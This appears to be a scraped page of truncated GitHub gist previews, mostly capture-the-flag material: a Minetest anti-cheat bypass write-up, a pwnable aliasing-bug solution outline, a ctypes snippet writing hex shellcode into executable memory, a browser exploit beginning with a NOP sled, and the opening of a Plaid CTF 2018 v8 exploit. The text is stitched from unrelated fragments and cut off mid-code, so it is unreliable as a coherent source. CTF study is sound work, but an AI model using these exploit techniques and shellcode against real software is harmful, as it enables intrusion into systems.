300 point
Web
Andrew Fasano
This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.
This challenge required that you write cheats for a minecraft clone to bypass a large wall | |
There are tons of ways to solve this, but here was the main idea. | |
- There was a function that would on the client side return if a player has certain privileges. | |
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent) | |
o Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯ | |
- You can patch this function to return true, and the client can now toggle these abilities. | |
However the binary had extra anti-cheat built in |
This challenge was a source only pwnable based on a aliasing bug with -O2. Also not all the source code was given. | |
Intended solution outline: | |
- In the source in assignVotes, a voter and a candidate can become aliased, and -02 optimization causes an incorrect return value. | |
o If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value. | |
o Then when going to print the error message, it instead tries print the votes (if it is > than the address of main) | |
o This will print what ever point is given, allowing memory to be leaked up to a null | |
- Now with an arbitrary read, we can dump the binary and reverse the missing code. | |
- We can also leak libc addresses and dump libc (or take it from some other challenge) |
from timeit import timeit | |
from ctypes import * | |
''' | |
libc = CDLL('libc.so.6') | |
libc.mprotect(0x400000,0x1000,7) | |
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex') | |
#s = "\xc3" | |
libc.memcpy(0x400000, c_char_p(s),len(s)) |
I hereby claim:
To claim this, I am signing this object:
from binaryninja import (Architecture, RegisterInfo, InstructionInfo, | |
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext, | |
BranchType, | |
LowLevelILOperation, LLIL_TEMP, | |
LowLevelILLabel, | |
FlagRole, | |
LowLevelILFlagCondition, | |
log_error, | |
CallingConvention, | |
interaction, |
<script> | |
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } } | |
var sc = []; | |
for (var i=0; i<0x480; i++) { | |
sc.push(0x90); | |
} | |
//sc.push(0xcc); | |
//sc.push(0xeb); | |
//sc.push(0xfe); |
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9 |
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
/* ### Utils, thanks saelo ### */ | |
// | |
// Tiny module that provides big (64bit) integers. | |
// | |
// Copyright (c) 2016 Samuel Groß | |
// |
// Load Int library, thanks saelo! | |
load('util.js'); | |
load('int64.js'); | |
// Helpers to convert from float to in a few random places | |
var conva = new ArrayBuffer(8); | |
var convf = new Float64Array(conva); | |
var convi = new Uint32Array(conva); | |
var convi8 = new Uint8Array(conva); |